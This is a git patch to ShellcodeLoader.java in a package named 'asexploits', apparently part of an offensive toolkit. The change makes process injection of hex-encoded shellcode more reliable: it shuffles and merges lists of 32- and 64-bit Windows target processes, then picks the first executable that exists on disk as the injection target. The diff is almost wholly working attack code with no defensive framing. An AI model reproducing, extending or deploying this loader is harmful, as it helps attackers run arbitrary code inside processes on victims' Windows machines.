From 484f58e43d3857bbb0ab6bf69ee9559f980cf5fc Mon Sep 17 00:00:00 2001
From: yzddmr6 <yzddmr6@gmail.com>
Date: Tue, 27 Jun 2023 16:35:41 +0800
Subject: [PATCH] =?UTF-8?q?=E5=A2=9E=E5=BC=BA=E5=85=BC=E5=AE=B9=E6=80=A7?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 src/main/java/asexploits/ShellcodeLoader.java | 44 ++++++++++++++++---
 1 file changed, 37 insertions(+), 7 deletions(-)

diff --git a/src/main/java/asexploits/ShellcodeLoader.java b/src/main/java/asexploits/ShellcodeLoader.java
index bdd6e11..2e48247 100644
--- a/src/main/java/asexploits/ShellcodeLoader.java
+++ b/src/main/java/asexploits/ShellcodeLoader.java
@@ -12,6 +12,7 @@
 import com.sun.jna.win32.StdCallLibrary;
 import com.sun.jna.win32.W32APIOptions;
 
+import java.io.File;
 import java.util.Random;
 
 public class ShellcodeLoader {
@@ -60,21 +61,50 @@ public void loadShellCode(String shellcodeHex) {
     public void loadShellCode(String shellcodeHex, boolean is64) {
 
         String[] targetProcessArray = null;
+        //打乱数组顺序
+        shuffleArray(ProcessArrayx64);
+        shuffleArray(ProcessArrayx32);
         // java是64位且选择注入64位shellcode
         if (System.getProperty("sun.arch.data.model").equals("64") && is64) {
-            targetProcessArray = ProcessArrayx64;
+            targetProcessArray = mergeArrays(ProcessArrayx64, ProcessArrayx32);
         } else { //默认注入32位进程
-            targetProcessArray = ProcessArrayx32;
+            targetProcessArray = mergeArrays(ProcessArrayx32, ProcessArrayx64);
+        }
+        String targetProcess = null;
+        for (int i = 0; i < targetProcessArray.length; i++) {
+            targetProcess = targetProcessArray[i];
+            if (new File(targetProcess).exists()) {
+                break;
+            }
         }
-        int j = targetProcessArray.length;
-        byte b = 0;
-        Random random = new Random();
-        int k = b + random.nextInt(j);
-        String targetProcess = targetProcessArray[k];
         this.loadShellCode(shellcodeHex, targetProcess);
 
     }
 
+    public static void shuffleArray(String[] arr) {
+        Random rand = new Random();
+        for (int i = arr.length - 1; i > 0; i--) {
+            int index = rand.nextInt(i + 1);
+            String temp = arr[i];
+            arr[i] = arr[index];
+            arr[index] = temp;
+        }
+    }
+
+    public static String[] mergeArrays(String[] a, String[] b) {
+        String[] c = new String[a.length + b.length];
+        int i = 0;
+        for (String s : a) {
+            c[i] = s;
+            i++;
+        }
+        for (String s : b) {
+            c[i] = s;
+            i++;
+        }
+        return c;
+    }
+
     public void loadShellCode(String shellcodeHex, String targetProcess) {
         System.out.println("targetProcess: " + targetProcess);
         byte[] shellcode = hexStrToByteArray(shellcodeHex);